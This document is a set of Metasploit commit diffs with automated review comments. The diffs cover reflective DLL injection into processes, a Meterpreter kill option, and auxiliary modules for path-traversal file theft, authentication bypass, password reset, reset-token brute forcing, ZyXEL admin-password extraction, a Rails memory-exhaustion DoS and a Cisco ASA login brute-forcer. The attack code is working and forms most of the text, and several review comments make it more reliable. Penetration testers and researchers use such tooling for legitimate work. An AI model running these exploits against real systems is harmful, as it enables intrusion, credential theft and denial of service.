'Description' => 'Inject a DLL via a reflective loader', 'Description' => 'Inject a DLL via a reflective loader',
'Author' => [ 'sf' ], 'Author' => [ 'sf' ],
'References' => [ [ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ] ], 'References' => [
[ 'URL', 'https://github.com/stephenfewer/ReflectiveDLLInjection' ], # original
[ 'URL', 'https://github.com/rapid7/ReflectiveDLLInjection' ] # customisations
],
'Platform' => 'win', 'Platform' => 'win',
'Arch' => ARCH_X86_64, 'Arch' => ARCH_X86_64,
'PayloadCompat' => 'PayloadCompat' =>
@ -47,26 +51,8 @@ module Payload::Windows::ReflectiveDllInject_x64
end end
def stage_payload def stage_payload
dll = "" # Exceptions will be thrown by the mixin if there are issues.
offset = 0 dll, offset = load_rdi_dll(library_path)
begin
::File.open( library_path, "rb" ) { |f| dll += f.read(f.stat.size) }
pe = Rex::PeParsey::Pe.new( Rex::ImageSource::Memory.new( dll ) )
pe.exports.entries.each do |entry|
if( entry.name =~ /^\S*ReflectiveLoader\S*/ )
offset = pe.rva_to_file_offset( entry.rva )
break
end
end
raise "Can't find an exported ReflectiveLoader function!" if offset == 0
rescue
print_error( "Failed to read and parse Dll file: #{$!}" )
return
end
exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration exit_funk = [ @@exit_types['thread'] ].pack( "V" ) # Default to ExitThread for migration


@ -0,0 +1,60 @@
# -*- coding: binary -*-
require 'msf/core/reflective_dll_loader'
###
#
# This module exposes functionality which makes it easier to do
# Reflective DLL Injection into processes on a victim's machine.
#
###
module Msf::Post::Windows::ReflectiveDLLInjection
include Msf::ReflectiveDLLLoader
PAGE_ALIGN = 1024
#
# Inject the given shellcode into a target process.
#
# @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
# The process to inject the shellcode into.
# @param shellcode [String] The shellcode to inject.
#
# @return [Fixnum] Address of the shellcode in the target process's
# memory.
#
def inject_into_process(process, shellcode)
shellcode_size = shellcode.length
unless shellcode.length % PAGE_ALIGN == 0
shellcode_size += PAGE_ALIGN - (shellcode.length % PAGE_ALIGN)
end
shellcode_mem = process.memory.allocate(shellcode_size)
process.memory.protect(shellcode_mem)
process.memory.write(shellcode_mem, shellcode)
return shellcode_mem
end
#
# Inject a reflectively-injectable DLL into the given process
# using reflective injection.
#
# @param process [Rex::Post::Meterpreter::Extensions::Stdapi::Sys::Process]
# The process to inject the shellcode into.
# @param dll_path [String] Path to the DLL that is to be loaded and injected.
#
# @return [Array] Tuple of allocated memory address and offset to the
# +ReflectiveLoader+ function.
#
def inject_dll_into_process(process, dll_path)
dll, offset = load_rdi_dll(dll_path)
dll_mem = inject_into_process(process, dll)
return dll_mem, offset
end
end
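Review bot: `PAGE_ALIGN = 1024` does not match the name — the Windows page size on x86/x64 is 4096 — so `inject_into_process` rounds the allocation to 1 KiB, not to a page; if `process.memory.allocate` already rounds to page granularity this is harmless, but either rename the constant or set it to 4096 with a comment on the intent. `process.memory.protect(shellcode_mem)` is called without an explicit protection argument, so the resulting protection depends on that method's default and is not visible here; stating the intended flag makes the security property explicit. The `@param process` doc on `inject_dll_into_process` still reads "The process to inject the shellcode into" and should say DLL.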


@ -0,0 +1,43 @@
# -*- coding: binary -*-
###
#
# This mixin contains functionality which loads a Reflective
# DLL from disk into memory and finds the offset of the
# reflective loader's entry point.
#
###
module Msf::ReflectiveDLLLoader
#
# Load a reflectively-injectable DLL from disk and find the offset
# to the ReflectiveLoader function inside the DLL.
#
# @param dll_path Path to the DLL to load.
#
# @return [Array] Tuple of DLL contents and offset to the
# +ReflectiveLoader+ function within the DLL.
#
def load_rdi_dll(dll_path)
dll = ''
offset = nil
::File.open(dll_path, 'rb') { |f| dll = f.read }
pe = Rex::PeParsey::Pe.new(Rex::ImageSource::Memory.new(dll))
pe.exports.entries.each do |e|
if e.name =~ /^\S*ReflectiveLoader\S*/
offset = pe.rva_to_file_offset(e.rva)
break
end
end
unless offset
raise "Cannot find the ReflectiveLoader entry point in #{dll_path}"
end
return dll, offset
end
end
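Review bot: This file references `Rex::PeParsey::Pe` and `Rex::ImageSource::Memory` but has no `require 'rex/peparsey'`, and the same commit drops that require from the two payload mixins that used to do the parsing, so the loader now depends on something else having loaded the PE parser first; adding `require 'rex/peparsey'` after the coding comment removes the load-order dependency. `::File.open(dll_path, 'rb') { |f| dll = f.read }` can be `dll = ::File.binread(dll_path)`, and `@param dll_path` should carry a `[String]` type like the other YARD tags in this commit.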


@ -169,21 +169,11 @@ require 'msf/core/exe/segment_injector'
payload = win32_rwx_exec(code) payload = win32_rwx_exec(code)
# Create a new PE object and run through sanity checks # Create a new PE object and run through sanity checks
endjunk = true
fsize = File.size(opts[:template]) fsize = File.size(opts[:template])
pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true) pe = Rex::PeParsey::Pe.new_from_file(opts[:template], true)
text = nil text = nil
sections_end = 0
pe.sections.each do |sec| pe.sections.each do |sec|
text = sec if sec.name == ".text" text = sec if sec.name == ".text"
sections_end = sec.size + sec.file_offset if sec.file_offset >= sections_end
endjunk = false if sec.contains_file_offset?(fsize-1)
end
#also check to see if there is a certificate
cert_entry = pe.hdr.opt['DataDirectory'][4]
#if the cert is the only thing past the sections, we can handle.
if cert_entry.v['VirtualAddress'] + cert_entry.v['Size'] >= fsize and sections_end >= cert_entry.v['VirtualAddress']
endjunk = false
end end
#try to inject code into executable by adding a section without affecting executable behavior #try to inject code into executable by adding a section without affecting executable behavior
@ -1729,8 +1719,25 @@ def self.to_vba(framework,code,opts={})
def self.to_executable_fmt_formats def self.to_executable_fmt_formats
[ [
'dll','exe','exe-service','exe-small','exe-only','elf','macho','vba','vba-exe', "asp",
'vbs','loop-vbs','asp','aspx', 'aspx-exe','war','psh','psh-net', 'msi', 'msi-nouac' "aspx",
"aspx-exe",
"dll",
"elf",
"exe",
"exe-only",
"exe-service",
"exe-small",
"loop-vbs",
"macho",
"msi",
"msi-nouac",
"psh",
"psh-net",
"vba",
"vba-exe",
"vbs",
"war"
] ]
end end
@ -1757,4 +1764,3 @@ def self.to_vba(framework,code,opts={})
end end
end end
end end
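Review bot: `fsize = File.size(opts[:template])` is kept while its only visible uses (the overlay and certificate checks) are deleted, which leaves an unused local unless something further down the method still reads it; that part of the method is outside the hunk. Dropping the `endjunk` logic also means a template with data past the last section (an overlay or an Authenticode signature) is no longer detected before injection; if the segment injector now handles that case, a one-line comment saying so where the check used to be would stop the next reader from re-adding it.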


@ -329,13 +329,20 @@ class Console::CommandDispatcher::Stdapi::Sys
return true return true
end end
# validate all the proposed pids first so we can bail if one is bogus self_destruct = args.include?("-s")
valid_pids = validate_pids(args)
args.uniq! if self_destruct
diff = args - valid_pids.map {|e| e.to_s} valid_pids = [client.sys.process.getpid.to_i]
if not diff.empty? # then we had an invalid pid else
print_error("The following pids are not valid: #{diff.join(", ").to_s}. Quitting") valid_pids = validate_pids(args)
return false
# validate all the proposed pids first so we can bail if one is bogus
args.uniq!
diff = args - valid_pids.map {|e| e.to_s}
if not diff.empty? # then we had an invalid pid
print_error("The following pids are not valid: #{diff.join(", ").to_s}. Quitting")
return false
end
end end
# kill kill kill # kill kill kill
@ -348,8 +355,9 @@ class Console::CommandDispatcher::Stdapi::Sys
# help for the kill command # help for the kill command
# #
def cmd_kill_help def cmd_kill_help
print_line("Usage: kill pid1 pid2 pid3 ...") print_line("Usage: kill [pid1 [pid2 [pid3 ...]]] [-s]")
print_line("Terminate one or more processes.") print_line("Terminate one or more processes.")
print_line(" -s : Kills the pid associated with the current session.")
end end
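Review bot: When `-s` is present, any pids also given on the command line are silently discarded because the `self_destruct` branch replaces `valid_pids` without looking at `args`; a `print_warning("Ignoring explicit pids because -s was given") if args.length > 1` before the assignment would make that visible. The help text should also say the consequence, e.g. `print_line(" -s : Kills the pid associated with the current session (the session will be lost).")`. The kill loop after `# kill kill kill` is outside the hunk, so I cannot tell whether the literal `-s` left in `args` reaches it.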
# #


@ -115,6 +115,52 @@ module Text
return hexify(str, wrap, '"', '" +', "#{name} = \n", '"') return hexify(str, wrap, '"', '" +', "#{name} = \n", '"')
end end
#
# Creates a comma separated list of numbers
#
def self.to_num(str, wrap = DefaultWrap)
code = str.unpack('C*')
buff = ""
0.upto(code.length-1) do |byte|
if(byte % 15 == 0) and (buff.length > 0)
buff << "\r\n"
end
buff << sprintf('0x%.2x, ', code[byte])
end
# strip , at the end
buff = buff.chomp(', ')
buff << "\r\n"
return buff
end
#
# Creates a comma separated list of dwords
#
def self.to_dword(str, wrap = DefaultWrap)
code = str
alignnr = str.length % 4
if (alignnr > 0)
code << "\x00" * (4 - alignnr)
end
codevalues = Array.new
code.split("").each_slice(4) do |chars4|
chars4 = chars4.join("")
dwordvalue = chars4.unpack('*V')
codevalues.push(dwordvalue[0])
end
buff = ""
0.upto(codevalues.length-1) do |byte|
if(byte % 8 == 0) and (buff.length > 0)
buff << "\r\n"
end
buff << sprintf('0x%.8x, ', codevalues[byte])
end
# strip , at the end
buff = buff.chomp(', ')
buff << "\r\n"
return buff
end
# #
# Creates a ruby-style comment # Creates a ruby-style comment
# #
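Review bot: `to_dword` mutates its argument: `code = str` aliases the caller's string and `code << "\x00" * (4 - alignnr)` appends the padding to it, so a buffer passed through `Buffer.transform(buf, 'dword')` comes back longer than it went in; `code = str.dup` (or `code = str + "\x00" * (4 - alignnr)`) fixes that. `chars4.unpack('*V')` looks transposed — the count suffix belongs after the directive — so `chars4.unpack('V')` is the intended form; older Rubies appear to ignore the stray `*`, which is why it works today. In both methods the `wrap` parameter is accepted but never used, and the loop index is named `byte` although it indexes into `code`/`codevalues`.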


@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Trying to login")
print_status("#{@peer} - Trying to login")
if login if login
print_good("#{@peer} - Login successful") print_good("#{peer} - Login successful")
else else
print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options") print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
return return
end end
@ -69,7 +67,7 @@ class Metasploit3 < Msf::Auxiliary
@traversal.gsub!(/\//, "\\") @traversal.gsub!(/\//, "\\")
file.gsub!(/\//, "\\") file.gsub!(/\//, "\\")
else # unix else # unix
print_error("#{@peer} - *nix platform detected, vulnerability is only known to work on Windows") print_error("#{peer} - *nix platform detected, vulnerability is only known to work on Windows")
return return
end end
@ -83,7 +81,7 @@ class Metasploit3 < Msf::Auxiliary
def read_file(file) def read_file(file)
print_status("#{@peer} - Retrieving file contents...") print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -98,14 +96,14 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0 if res and res.code == 200 and res.headers['Content-Type'] and res.body.length > 0
store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file) store_path = store_loot("axigen.webadmin.data", "application/octet-stream", rhost, res.body, file)
print_good("#{@peer} - File successfully retrieved and saved on #{store_path}") print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
else else
print_error("#{@peer} - Failed to retrieve file") print_error("#{peer} - Failed to retrieve file")
end end
end end
def delete_file(file) def delete_file(file)
print_status("#{@peer} - Deleting file #{file}") print_status("#{peer} - Deleting file #{file}")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -121,14 +119,14 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res and res.code == 200 and res.body =~ /View Log Files/ if res and res.code == 200 and res.body =~ /View Log Files/
print_good("#{@peer} - File #{file} deleted") print_good("#{peer} - File #{file} deleted")
else else
print_error("#{@peer} - Error deleting file #{file}") print_error("#{peer} - Error deleting file #{file}")
end end
end end
def get_platform def get_platform
print_status("#{@peer} - Retrieving platform") print_status("#{peer} - Retrieving platform")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -142,15 +140,15 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200 if res and res.code == 200
if res.body =~ /Windows/ if res.body =~ /Windows/
print_good("#{@peer} - Windows platform found") print_good("#{peer} - Windows platform found")
return 'windows' return 'windows'
elsif res.body =~ /Linux/ elsif res.body =~ /Linux/
print_good("#{@peer} - Linux platform found") print_good("#{peer} - Linux platform found")
return 'unix' return 'unix'
end end
end end
print_warning("#{@peer} - Platform not found, assuming UNIX flavor") print_warning("#{peer} - Platform not found, assuming UNIX flavor")
return 'unix' return 'unix'
end end


@ -76,19 +76,17 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
@peer = "#{rhost}:#{rport}"
if not has_auth if not has_auth
print_error("#{@peer} - No basic authentication enabled") print_error("#{peer} - No basic authentication enabled")
return return
end end
bypass_string = try_auth bypass_string = try_auth
if bypass_string.empty? if bypass_string.empty?
print_error("#{@peer} - The bypass attempt did not work") print_error("#{peer} - The bypass attempt did not work")
else else
print_good("#{@peer} - You can bypass auth by doing: #{bypass_string}") print_good("#{peer} - You can bypass auth by doing: #{bypass_string}")
end end
end end


@ -52,23 +52,22 @@ class Metasploit3 < Msf::Auxiliary
}) })
if (res and (m = res.headers['Server'].match(/Boa\/(.*)/))) if (res and (m = res.headers['Server'].match(/Boa\/(.*)/)))
print_status("#{@peer} - Boa Version Detected: #{m[1]}") print_status("#{peer} - Boa Version Detected: #{m[1]}")
return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version return Exploit::CheckCode::Safe if (m[1][0].ord-48>0) # boa server wrong version
return Exploit::CheckCode::Safe if (m[1][3].ord-48>4) return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)
return Exploit::CheckCode::Vulnerable return Exploit::CheckCode::Vulnerable
else else
print_status("#{@peer} - Not a Boa Server!") print_status("#{peer} - Not a Boa Server!")
return Exploit::CheckCode::Safe # not a boa server return Exploit::CheckCode::Safe # not a boa server
end end
rescue Rex::ConnectionRefused rescue Rex::ConnectionRefused
print_error("#{@peer} - Connection refused by server.") print_error("#{peer} - Connection refused by server.")
return Exploit::CheckCode::Safe return Exploit::CheckCode::Safe
end end
end end
def run def run
@peer = "#{rhost}:#{rport}"
return if check != Exploit::CheckCode::Vulnerable return if check != Exploit::CheckCode::Vulnerable
uri = normalize_uri(target_uri.path) uri = normalize_uri(target_uri.path)
@ -81,14 +80,14 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res.nil? if res.nil?
print_error("#{@peer} - The server may be down") print_error("#{peer} - The server may be down")
return return
elsif res and res.code != 401 elsif res and res.code != 401
print_status("#{@peer} - #{uri} does not have basic authentication enabled") print_status("#{peer} - #{uri} does not have basic authentication enabled")
return return
end end
print_status("#{@peer} - Server still operational. Checking to see if password has been overwritten") print_status("#{peer} - Server still operational. Checking to see if password has been overwritten")
res = send_request_cgi({ res = send_request_cgi({
'uri' => uri, 'uri' => uri,
'method'=> 'GET', 'method'=> 'GET',
@ -96,17 +95,17 @@ class Metasploit3 < Msf::Auxiliary
}) })
if not res if not res
print_error("#{@peer} - Server timedout, will not continue") print_error("#{peer} - Server timedout, will not continue")
return return
end end
case res.code case res.code
when 200 when 200
print_good("#{@peer} - Password reset successful with admin:#{datastore['PASSWORD']}") print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}")
when 401 when 401
print_error("#{@peer} - Access forbidden. The password reset attempt did not work") print_error("#{peer} - Access forbidden. The password reset attempt did not work")
else else
print_status("#{@peer} - Unexpected response: Code #{res.code} encountered") print_status("#{peer} - Unexpected response: Code #{res.code} encountered")
end end
end end
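Review bot: The version test `return Exploit::CheckCode::Safe if (m[1][3].ord-48>4)` indexes the fourth character of the Server banner's version string, so a banner such as `Boa/0.9` makes `m[1][3]` nil and check raises NoMethodError instead of returning a CheckCode; guard it with `return Exploit::CheckCode::Unknown if m[1].length < 4` before the per-character comparisons. In the second hunk, `elsif res and res.code != 401` re-tests a `res` that `if res.nil?` has already rejected. The successful reset at `print_good("#{peer} - Password reset successful with admin:#{datastore['PASSWORD']}")` is not recorded with report_auth_info, unlike the login modules elsewhere in this commit, so the working credential survives only in console output. check's enclosing begin/rescue starts outside the first hunk.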


@ -51,13 +51,11 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Trying to login")
print_status("#{@peer} - Trying to login")
if login if login
print_good("#{@peer} - Login successful") print_good("#{peer} - Login successful")
else else
print_error("#{@peer} - Login failed, review USERNAME and PASSWORD options") print_error("#{peer} - Login failed, review USERNAME and PASSWORD options")
return return
end end
@ -71,7 +69,7 @@ class Metasploit3 < Msf::Auxiliary
def read_file(file) def read_file(file)
print_status("#{@peer} - Copying file to Web location...") print_status("#{peer} - Copying file to Web location...")
dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/" dst_path = "/usr/jakarta/tomcat/webapps/ROOT/m/"
res = send_request_cgi( res = send_request_cgi(
@ -88,12 +86,12 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res and res.code == 200 and res.body =~ /\{"success":true\}/ if res and res.code == 200 and res.body =~ /\{"success":true\}/
print_good("#{@peer} - File #{file} copied to #{dst_path} successfully") print_good("#{peer} - File #{file} copied to #{dst_path} successfully")
else else
print_error("#{@peer} - Failed to copy #{file} to #{dst_path}") print_error("#{peer} - Failed to copy #{file} to #{dst_path}")
end end
print_status("#{@peer} - Retrieving file contents...") print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -103,9 +101,9 @@ class Metasploit3 < Msf::Auxiliary
if res and res.code == 200 if res and res.code == 200
store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file) store_path = store_loot("mutiny.frontend.data", "application/octet-stream", rhost, res.body, file)
print_good("#{@peer} - File successfully retrieved and saved on #{store_path}") print_good("#{peer} - File successfully retrieved and saved on #{store_path}")
else else
print_error("#{@peer} - Failed to retrieve file") print_error("#{peer} - Failed to retrieve file")
end end
# Cleanup # Cleanup
@ -113,7 +111,7 @@ class Metasploit3 < Msf::Auxiliary
end end
def delete_file(file) def delete_file(file)
print_status("#{@peer} - Deleting file #{file}") print_status("#{peer} - Deleting file #{file}")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -127,9 +125,9 @@ class Metasploit3 < Msf::Auxiliary
}) })
if res and res.code == 200 and res.body =~ /\{"success":true\}/ if res and res.code == 200 and res.body =~ /\{"success":true\}/
print_good("#{@peer} - File #{file} deleted") print_good("#{peer} - File #{file} deleted")
else else
print_error("#{@peer} - Error deleting file #{file}") print_error("#{peer} - Error deleting file #{file}")
end end
end end
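Review bot: In read_file, a failed copy at `print_error("#{peer} - Failed to copy #{file} to #{dst_path}")` does not stop the method, so the "Retrieving file contents" request is still sent and store_loot may save whatever stale content already sits at the web location; add `return` after that print_error. The delete_file hunk logging and continuing is fine for a best-effort cleanup. Both methods continue outside their hunks.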


@ -52,6 +52,7 @@ class Metasploit3 < Msf::Auxiliary
[ [
OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']), OptString.new('TARGETURI', [ true, 'The request URI', '/users/password']),
OptString.new('TARGETEMAIL', [true, 'The email address of target account']), OptString.new('TARGETEMAIL', [true, 'The email address of target account']),
OptString.new('OBJECTNAME', [true, 'The user object name', 'user']),
OptString.new('PASSWORD', [true, 'The password to set']), OptString.new('PASSWORD', [true, 'The password to set']),
OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]), OptBool.new('FLUSHTOKENS', [ true, 'Flush existing reset tokens before trying', true]),
OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10]) OptInt.new('MAXINT', [true, 'Max integer to try (tokens begining with a higher int will fail)', 10])
@ -61,7 +62,7 @@ class Metasploit3 < Msf::Auxiliary
def generate_token(account) def generate_token(account)
# CSRF token from GET "/users/password/new" isn't actually validated it seems. # CSRF token from GET "/users/password/new" isn't actually validated it seems.
postdata="user[email]=#{account}" postdata="#{datastore['OBJECTNAME']}[email]=#{account}"
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']), 'uri' => normalize_uri(datastore['TARGETURI']),
@ -100,11 +101,11 @@ class Metasploit3 < Msf::Auxiliary
encode_pass = REXML::Text.new(password).to_s encode_pass = REXML::Text.new(password).to_s
xml = "" xml = ""
xml << "<user>" xml << "<#{datastore['OBJECTNAME']}>"
xml << "<password>#{encode_pass}</password>" xml << "<password>#{encode_pass}</password>"
xml << "<password_confirmation>#{encode_pass}</password_confirmation>" xml << "<password_confirmation>#{encode_pass}</password_confirmation>"
xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>" xml << "<reset_password_token type=\"integer\">#{int_to_try}</reset_password_token>"
xml << "</user>" xml << "</#{datastore['OBJECTNAME']}>"
res = send_request_cgi({ res = send_request_cgi({
'uri' => normalize_uri(datastore['TARGETURI']), 'uri' => normalize_uri(datastore['TARGETURI']),
@ -144,9 +145,10 @@ class Metasploit3 < Msf::Auxiliary
def run def run
# Clear outstanding reset tokens, helps ensure we hit the intended account. # Clear outstanding reset tokens, helps ensure we hit the intended account.
print_status("Clearing existing tokens...") if datastore['FLUSHTOKENS']
clear_tokens() if datastore['FLUSHTOKENS'] print_status("Clearing existing tokens...")
clear_tokens()
end
# Generate a token for our account # Generate a token for our account
print_status("Generating reset token for #{datastore['TARGETEMAIL']}...") print_status("Generating reset token for #{datastore['TARGETEMAIL']}...")
status = generate_token(datastore['TARGETEMAIL']) status = generate_token(datastore['TARGETEMAIL'])
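Review bot: `postdata="#{datastore['OBJECTNAME']}[email]=#{account}"` still inserts the e-mail address into the form body without URL-encoding, so an address containing `+` or `&` is sent wrong; letting HttpClient encode it, `'vars_post' => { "#{datastore['OBJECTNAME']}[email]" => account }` in place of the hand-built body, avoids that (the send_request_cgi call that consumes postdata is outside the hunk, so it is presumably passed as raw data). The same OBJECTNAME value is interpolated as an XML element name at `xml << "<#{datastore['OBJECTNAME']}>"`; a value with whitespace or `<` yields malformed XML, which is worth a note on the OptString description, e.g. `'The user object name (used as a form key and XML element name)'`.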


@ -72,7 +72,7 @@ class Metasploit3 < Msf::Auxiliary
travs << file travs << file
travs << "%00" travs << "%00"
print_status("#{@peer} - Retrieving file contents...") print_status("#{peer} - Retrieving file contents...")
res = send_request_cgi( res = send_request_cgi(
{ {
@ -95,19 +95,17 @@ class Metasploit3 < Msf::Auxiliary
end end
def run def run
@peer = "#{rhost}:#{rport}" print_status("#{peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
print_status("#{@peer} - Checking if it's a Sophos Web Protect Appliance with the vulnerable component...")
if is_proficy? if is_proficy?
print_good("#{@peer} - Check successful") print_good("#{peer} - Check successful")
else else
print_error("#{@peer} - Sophos Web Protect Appliance vulnerable component not found") print_error("#{peer} - Sophos Web Protect Appliance vulnerable component not found")
return return
end end
contents = read_file(datastore['FILEPATH']) contents = read_file(datastore['FILEPATH'])
if contents.nil? if contents.nil?
print_error("#{@peer} - File not downloaded") print_error("#{peer} - File not downloaded")
return return
end end
@ -119,7 +117,7 @@ class Metasploit3 < Msf::Auxiliary
contents, contents,
file_name file_name
) )
print_good("#{rhost}:#{rport} - File saved in: #{path}") print_good("#{peer} - File saved in: #{path}")
end end
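Review bot: `if is_proficy?` is called from a run whose messages describe a Sophos Web Protect Appliance; the helper name looks left over from another module and will mislead anyone searching for the Sophos check, so rename it (for example `is_sophos_wpa?`) or add `# is_proficy? performs the Sophos vulnerable-component check` at the call site. The helper's definition is outside the hunk.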


@ -0,0 +1,79 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
def initialize
super(
'Name' => 'ZyXEL GS1510-16 Password Extractor',
'Description' => %q{
This module exploits a vulnerability in ZyXEL GS1510-16 routers
to extract the admin password. Due to a lack of authentication on the
webctrl.cgi script, unauthenticated attackers can recover the
administrator password for these devices. The vulnerable device
has reached end of life for support from the manufacturer, so it is
unlikely this problem will be addressed.
},
'References' =>
[
[ 'URL', 'https://github.com/rapid7/metasploit-framework/pull/2709' ]
],
'Author' => [
'Daniel Manser', # @antsygeek
'Sven Vetsch' # @disenchant_ch
],
'License' => MSF_LICENSE
)
end
def run
begin
print_status("Trying to get 'admin' user password ...")
res = send_request_cgi({
'uri' => "/webctrl.cgi",
'method' => 'POST',
'vars_post' => {
'username' => "admin",
'password' => "#{Rex::Text.rand_text_alphanumeric(rand(4)+4)}",
'action' => "cgi_login"
}
}, 10)
if (res && res.code == 200)
print_status("Got response from router.")
else
print_error('Unexpected HTTP response code.')
return
end
admin_password = ""
admin_password_matches = res.body.match(/show_user\(1,"admin","(.+)"/);
if not admin_password_matches
print_error('Could not obtain admin password')
return
else
admin_password = admin_password_matches[1];
print_good("Password for user 'admin' is: #{admin_password}")
report_auth_info(
:host => rhost,
:port => rport,
:sname => "ZyXEL GS1510-16",
:user => 'admin',
:pass => admin_password,
:active => true
)
end
rescue ::Rex::ConnectionError
print_error("#{rhost}:#{rport} - Failed to connect")
return
end
end
end
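Review bot: `admin_password_matches = res.body.match(/show_user\(1,"admin","(.+)"/);` and `admin_password = admin_password_matches[1];` carry trailing semicolons, and `admin_password = ""` just above is dead since the only use reassigns it; drop all three. report_auth_info here omits `:type => 'password'`, which the other login modules in this commit supply, so the credential is stored without a type. `if not admin_password_matches` reads better as `unless`, and `"#{Rex::Text.rand_text_alphanumeric(rand(4)+4)}"` interpolates a string into an otherwise empty string, so the bare call is enough.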


@ -0,0 +1,120 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::Tcp
include Msf::Auxiliary::Dos
def initialize(info = {})
super(update_info(info,
'Name' => 'Ruby-on-Rails Action View MIME Memory Exhaustion',
'Description' => %q{
This module exploits a Denial of Service (DoS) condition in Action View that requires
a controller action. By sending a specially crafted content-type header to a rails
application, it is possible for it to store the invalid MIME type, and may eventually
consumes all memory if enough invalid MIMEs are given.
Versions 3.0.0 and other later versions are affected, fixed in 4.0.2 and 3.2.16.
},
'Author' =>
[
'Toby Hsieh', # Reported the issue
'joev', # Metasploit
'sinn3r' # Metasploit
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2013-6414' ],
[ 'OSVDB', '100525' ],
[ 'BID', '64074' ],
[ 'URL', 'http://seclists.org/oss-sec/2013/q4/400' ],
[ 'URL', 'https://github.com/rails/rails/commit/bee3b7f9371d1e2ddcfe6eaff5dcb26c0a248068' ]
],
'DisclosureDate' => 'Dec 04 2013'))
register_options(
[
Opt::RPORT(80),
OptString.new('URIPATH', [true, 'The URI that routes to a Rails controller action', '/']),
OptInt.new('MAXSTRINGSIZE', [true, 'Max string size', 60000]),
OptInt.new('REQCOUNT', [true, 'Number of HTTP requests to pipeline per connection', 1]),
OptInt.new('RLIMIT', [true, 'Number of requests to send', 100000])
],
self.class)
end
def host
host = datastore['RHOST']
host += ":" + datastore['RPORT'].to_s if datastore['RPORT'] != 80
host
end
def long_string
Rex::Text.rand_text_alphanumeric(datastore['MAXSTRINGSIZE'])
end
#
# Returns a modified version of the URI that:
# 1. Always has a starting slash
# 2. Removes all the double slashes
#
def normalize_uri(*strs)
new_str = strs * "/"
new_str = new_str.gsub!("//", "/") while new_str.index("//")
# Makes sure there's a starting slash
unless new_str.start_with?("/")
new_str = '/' + new_str
end
new_str
end
def http_request
uri = normalize_uri(datastore['URIPATH'])
http = ''
http << "GET #{uri} HTTP/1.1\r\n"
http << "Host: #{host}\r\n"
http << "Accept: #{long_string}\r\n"
http << "\r\n"
http
end
def run
begin
print_status("Stressing the target memory, this will take quite some time...")
datastore['RLIMIT'].times { |i|
connect
datastore['REQCOUNT'].times { sock.put(http_request) }
disconnect
}
print_status("Attack finished. Either the server isn't vulnerable, or please dos harder.")
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
print_status("Unable to connect to #{host}.")
rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error
print_good("DoS successful. #{host} not responding. Out Of Memory condition probably reached.")
ensure
disconnect
end
end
end
=begin
Reproduce:
1. Add a def index; end to ApplicationController
2. Add an empty index.html.erb file to app/views/application/index.html.erb
3. Uncomment the last line in routes.rb
4. Hit /application
=end
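Review bot: The description says the module sends a specially crafted content-type header, but http_request sets `http << "Accept: #{long_string}\r\n"` and no Content-Type; either the description or the header is wrong, and the upstream commit in References is where to confirm which. In `host`, `datastore['RPORT'] != 80` compares against an Integer; if the datastore hands the option back as a String the port suffix is always appended, and `datastore['RPORT'].to_i != 80` is safe either way (inferred, the datastore type is not visible here). `rescue ::Errno::ECONNRESET, ::Errno::EPIPE, ::Timeout::Error` treats a single reset as a successful DoS; a comment noting that this is a heuristic, or one reconnect attempt before printing success, would make the result less misleading.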


@ -0,0 +1,138 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'rex/proto/http'
require 'msf/core'
class Metasploit3 < Msf::Auxiliary
include Msf::Exploit::Remote::HttpClient
include Msf::Auxiliary::Report
include Msf::Auxiliary::AuthBrute
include Msf::Auxiliary::Scanner
def initialize(info={})
super(update_info(info,
'Name' => 'Cisco ASA ASDM Bruteforce Login Utility',
'Description' => %{
This module scans for Cisco ASA ASDM web login portals and
performs login brute force to identify valid credentials.
},
'Author' =>
[
'Jonathan Claudius <jclaudius[at]trustwave.com>',
],
'License' => MSF_LICENSE
))
register_options(
[
Opt::RPORT(443),
OptBool.new('SSL', [true, "Negotiate SSL for outgoing connections", true]),
